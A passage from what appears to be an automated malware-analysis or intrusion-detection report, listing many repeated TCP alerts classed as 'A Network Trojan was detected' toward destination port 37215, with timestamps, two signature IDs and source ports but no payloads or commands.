                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632406
                  SID:2835222
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:51084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.137438
                  SID:2835222
                  Source Port:52092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.129379
                  SID:2835222
                  Source Port:43510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161140
                  SID:2835222
                  Source Port:41012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854117
                  SID:2829579
                  Source Port:55644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468410
                  SID:2829579
                  Source Port:48504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851044
                  SID:2835222
                  Source Port:51394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637493
                  SID:2829579
                  Source Port:48298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342046
                  SID:2829579
                  Source Port:35680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.252439
                  SID:2835222
                  Source Port:47220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868135
                  SID:2835222
                  Source Port:35162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.766044
                  SID:2835222
                  Source Port:53240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.996210
                  SID:2835222
                  Source Port:51312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.523582
                  SID:2835222
                  Source Port:45214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.221406
                  SID:2835222
                  Source Port:55312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008169
                  SID:2835222
                  Source Port:60484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.549271
                  SID:2829579
                  Source Port:53796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.533380
                  SID:2829579
                  Source Port:44396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2835222
                  Source Port:46862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.855669
                  SID:2835222
                  Source Port:38898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.391791
                  SID:2835222
                  Source Port:43450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.881197
                  SID:2835222
                  Source Port:39102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.004122
                  SID:2829579
                  Source Port:34952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.671391
                  SID:2829579
                  Source Port:50698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869693
                  SID:2829579
                  Source Port:39140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.489783
                  SID:2829579
                  Source Port:37952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736884
                  SID:2835222
                  Source Port:48288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.174408
                  SID:2829579
                  Source Port:53574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.674320
                  SID:2829579
                  Source Port:60156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.995730
                  SID:2829579
                  Source Port:42798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.900860
                  SID:2829579
                  Source Port:60512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851193
                  SID:2835222
                  Source Port:33202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.457969
                  SID:2835222
                  Source Port:43470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736673
                  SID:2829579
                  Source Port:48370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.600329
                  SID:2829579
                  Source Port:51820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.681028
                  SID:2835222
                  Source Port:33796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.406060
                  SID:2829579
                  Source Port:33174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.485885
                  SID:2829579
                  Source Port:34356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.168709
                  SID:2835222
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.513537
                  SID:2835222
                  Source Port:49926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.484903
                  SID:2829579
                  Source Port:47274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423128
                  SID:2829579
                  Source Port:47098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.199657
                  SID:2835222
                  Source Port:45396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:60832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.921580
                  SID:2835222
                  Source Port:56594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883243
                  SID:2829579
                  Source Port:59736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.607971
                  SID:2829579
                  Source Port:49268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.496514
                  SID:2829579
                  Source Port:45368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.876444
                  SID:2829579
                  Source Port:39782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019477
                  SID:2829579
                  Source Port:57292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.048533
                  SID:2829579
                  Source Port:51530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802588
                  SID:2829579
                  Source Port:38578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.967608
                  SID:2829579
                  Source Port:33126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207005
                  SID:2829579
                  Source Port:35758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.793642
                  SID:2829579
                  Source Port:35002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.903191
                  SID:2829579
                  Source Port:41562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2835222
                  Source Port:49088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011979
                  SID:2829579
                  Source Port:45410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980706
                  SID:2829579
                  Source Port:59752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000164
                  SID:2829579
                  Source Port:50402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.327506
                  SID:2835222
                  Source Port:51222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.933010
                  SID:2835222
                  Source Port:38102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.397639
                  SID:2829579
                  Source Port:50246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168477
                  SID:2835222
                  Source Port:48626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.150804
                  SID:2829579
                  Source Port:51462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.841293
                  SID:2829579
                  Source Port:49178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172944
                  SID:2829579
                  Source Port:54784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.774458
                  SID:2829579
                  Source Port:53124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996817
                  SID:2835222
                  Source Port:48918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.155522
                  SID:2829579
                  Source Port:40824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.537865
                  SID:2829579
                  Source Port:50476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.251231
                  SID:2835222
                  Source Port:44638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.652052
                  SID:2835222
                  Source Port:44536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663008
                  SID:2835222
                  Source Port:40234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.452806
                  SID:2829579
                  Source Port:35702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.812740
                  SID:2835222
                  Source Port:45286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.898408
                  SID:2835222
                  Source Port:52508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121517
                  SID:2835222
                  Source Port:47652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.272664
                  SID:2835222
                  Source Port:54208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.419620
                  SID:2829579
                  Source Port:39196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084469
                  SID:2829579
                  Source Port:40050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979594
                  SID:2829579
                  Source Port:54638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088792
                  SID:2835222
                  Source Port:40584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2835222
                  Source Port:60756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587332
                  SID:2829579
                  Source Port:55542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.758482
                  SID:2835222
                  Source Port:42894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.980953
                  SID:2835222
                  Source Port:33270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862612
                  SID:2835222
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.326882
                  SID:2829579
                  Source Port:43844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.690797
                  SID:2835222
                  Source Port:58260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.516215
                  SID:2829579
                  Source Port:59356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.584785
                  SID:2829579
                  Source Port:39056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343381
                  SID:2835222
                  Source Port:58280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467970
                  SID:2835222
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.592658
                  SID:2829579
                  Source Port:54138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.367944
                  SID:2829579
                  Source Port:34732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.670765
                  SID:2835222
                  Source Port:48118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186455
                  SID:2829579
                  Source Port:42040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.875785
                  SID:2829579
                  Source Port:53452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824053
                  SID:2835222
                  Source Port:51910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.518150
                  SID:2829579
                  Source Port:56934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.503174
                  SID:2829579
                  Source Port:47486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.390670
                  SID:2829579
                  Source Port:48330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785606
                  SID:2829579
                  Source Port:38538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.581201
                  SID:2835222
                  Source Port:39934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.167098
                  SID:2835222
                  Source Port:37186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300019
                  SID:2829579
                  Source Port:55866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238024
                  SID:2829579
                  Source Port:44650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126957
                  SID:2835222
                  Source Port:54620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.681028
                  SID:2829579
                  Source Port:44440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849744
                  SID:2829579
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819552
                  SID:2835222
                  Source Port:36868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.477430
                  SID:2829579
                  Source Port:57902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.521887
                  SID:2829579
                  Source Port:49998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:40426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.401938
                  SID:2835222
                  Source Port:60774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907350
                  SID:2829579
                  Source Port:34844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027039
                  SID:2829579
                  Source Port:53936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.862669
                  SID:2829579
                  Source Port:54538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.896856
                  SID:2835222
                  Source Port:48056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.848465
                  SID:2829579
                  Source Port:59662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.824361
                  SID:2829579
                  Source Port:36948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.565192
                  SID:2835222
                  Source Port:34354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.609085
                  SID:2829579
                  Source Port:49670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292595
                  SID:2835222
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.513310
                  SID:2829579
                  Source Port:37870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359612
                  SID:2829579
                  Source Port:35844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652707
                  SID:2829579
                  Source Port:42016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356358
                  SID:2829579
                  Source Port:53586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.903843
                  SID:2835222
                  Source Port:45722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.863618
                  SID:2835222
                  Source Port:37176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437797
                  SID:2835222
                  Source Port:37618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.454249
                  SID:2835222
                  Source Port:39182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102674
                  SID:2835222
                  Source Port:39652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2835222
                  Source Port:47454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.074634
                  SID:2829579
                  Source Port:59546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.668862
                  SID:2829579
                  Source Port:41246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271006
                  SID:2829579
                  Source Port:59520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.205776
                  SID:2835222
                  Source Port:47100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.499663
                  SID:2835222
                  Source Port:42426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558206
                  SID:2835222
                  Source Port:50460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.620930
                  SID:2829579
                  Source Port:46684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981965
                  SID:2829579
                  Source Port:42666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881994
                  SID:2829579
                  Source Port:52690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.372115
                  SID:2835222
                  Source Port:59750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.431901
                  SID:2835222
                  Source Port:47508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.023936
                  SID:2835222
                  Source Port:58442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.872230
                  SID:2835222
                  Source Port:57940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2835222
                  Source Port:54972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156684
                  SID:2829579
                  Source Port:56344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.903718
                  SID:2835222
                  Source Port:36930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.249351
                  SID:2829579
                  Source Port:51622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.856531
                  SID:2829579
                  Source Port:44198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883376
                  SID:2829579
                  Source Port:55194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887224
                  SID:2835222
                  Source Port:57354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509874
                  SID:2829579
                  Source Port:40900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.805311
                  SID:2835222
                  Source Port:35942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.388728
                  SID:2835222
                  Source Port:52904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910396
                  SID:2835222
                  Source Port:47784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525899
                  SID:2835222
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661745
                  SID:2835222
                  Source Port:59474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088022
                  SID:2829579
                  Source Port:57688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.625504
                  SID:2835222
                  Source Port:40500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.778453
                  SID:2835222
                  Source Port:37058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.188793
                  SID:2829579
                  Source Port:41464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.766848
                  SID:2829579
                  Source Port:58966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369689
                  SID:2835222
                  Source Port:41552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.464589
                  SID:2835222
                  Source Port:58934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.999763
                  SID:2829579
                  Source Port:42704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562058
                  SID:2829579
                  Source Port:48784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.110888
                  SID:2835222
                  Source Port:49712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.595205
                  SID:2829579
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.898002
                  SID:2835222
                  Source Port:53274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816754
                  SID:2829579
                  Source Port:55730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102138
                  SID:2835222
                  Source Port:54610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667282
                  SID:2835222
                  Source Port:46962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817942
                  SID:2835222
                  Source Port:50358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.745015
                  SID:2835222
                  Source Port:56566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824004
                  SID:2829579
                  Source Port:53162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.427217
                  SID:2835222
                  Source Port:57658
